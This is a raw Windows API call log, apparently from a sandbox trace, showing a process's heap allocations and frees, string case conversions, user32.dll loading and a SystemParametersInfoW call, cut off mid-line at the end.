[0247.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0247.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0247.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab578 [0247.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0247.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0247.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0247.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0247.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0247.206] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0247.206] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.206] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0247.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0247.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0247.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.207] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0247.207] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.208] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0247.209] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0247.209] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0247.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0247.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.210] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0247.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0247.211] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.212] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0247.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.212] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0247.213] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0247.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0247.214] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0247.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0247.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0247.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0247.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0247.216] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.216] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab968 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0247.217] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.217] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0247.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0247.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0247.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0247.218] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0247.218] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0247.219] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0247.219] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0247.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0247.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0247.220] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8c0 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0247.222] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0247.222] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0247.223] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0247.223] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0247.223] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76240000 [0247.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0247.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0247.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0247.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f6e80 [0247.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x29f6e80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0247.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0247.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0247.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0247.226] GetProcAddress (hModule=0x76240000, lpProcName="SystemParametersInfoW") returned 0x7626f210 [0247.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0247.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0247.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0247.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0247.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0247.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0247.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0247.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0247.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0247.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0247.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0247.228] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0247.228] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0247.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0247.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0247.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0247.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0247.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0247.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0247.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0247.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0247.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab758 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab770 [0247.421] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0247.421] FreeLibrary (hLibModule=0x76240000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a724f8 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72508 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab998 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0247.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0247.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 